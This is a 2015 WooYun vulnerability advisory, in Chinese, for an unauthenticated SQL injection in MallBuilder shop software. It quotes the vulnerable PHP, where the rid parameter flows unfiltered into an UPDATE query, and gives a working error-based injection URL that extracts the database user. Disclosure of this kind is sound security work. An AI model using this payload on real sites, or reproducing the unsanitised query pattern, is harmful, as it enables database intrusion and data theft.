当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120156

漏洞标题:mallbuilder多用户商城最新版SQL注入(二)

相关厂商:shop-builder.cn

漏洞作者: 路人甲

提交时间:2015-06-15 10:38

修复时间:2015-09-13 12:18

公开时间:2015-09-13 12:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向第三方安全合作伙伴开放
2015-08-09: 细节向核心白帽子及相关领域专家公开
2015-08-19: 细节向普通白帽子公开
2015-08-29: 细节向实习白帽子公开
2015-09-13: 细节向公众公开

简要描述:

无需登录,直接出数据

详细说明:

审核人员注意和这个漏洞不一样 WooYun: mallbuilder多用户商城系统最新版 多处SQL注入(官网demo) 选择的参数不同
看到message/admin_message_list_delbox.php

if(isset($_GET['did']))
{
	$pid=explode(',',$_GET['did']);
	foreach($pid as $val)
	{
		$msg->remove_mail($val);
	}
	die;
}
if(isset($_GET['rid']))
{
	$pid=explode(',',$_GET['rid']);
	foreach($pid as $val)
	{
		$msg->recover_mail($val);
	}
	die;
}


跟进

function recover_mail($id=NULL)
	{
		global $admin;
		if(isset($_POST["deid"])&&!empty($_POST['recover']))
		{
			for($i=0;$i<count($_POST["deid"]);$i++)
			{
				$id=$_POST["deid"][$i];
				$sql="update  ".FEEDBACK." set iflook=1 where id=$id";
				$this->db->query($sql);
				unset($sql);
			}
		}
		if(!empty($id))
		{
			$sql="update  ".FEEDBACK." set iflook=1 where id=$id";
			$this->db->query($sql);
			$admin->msg("main.php?m=message&s=admin_message_list_inbox");
		}
	}


由于不能出现逗号,所以构造以下exp

http://127.0.0.1/mallbuilderv5.8/?m=message&s=admin_message_list_delbox&rid=1 and EXP(~(select * from (select user())a))

漏洞证明:

直接出数据

QQ截图20150613011449.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-06-15 12:16

厂商回复:

已处理,谢谢!

最新状态:

暂无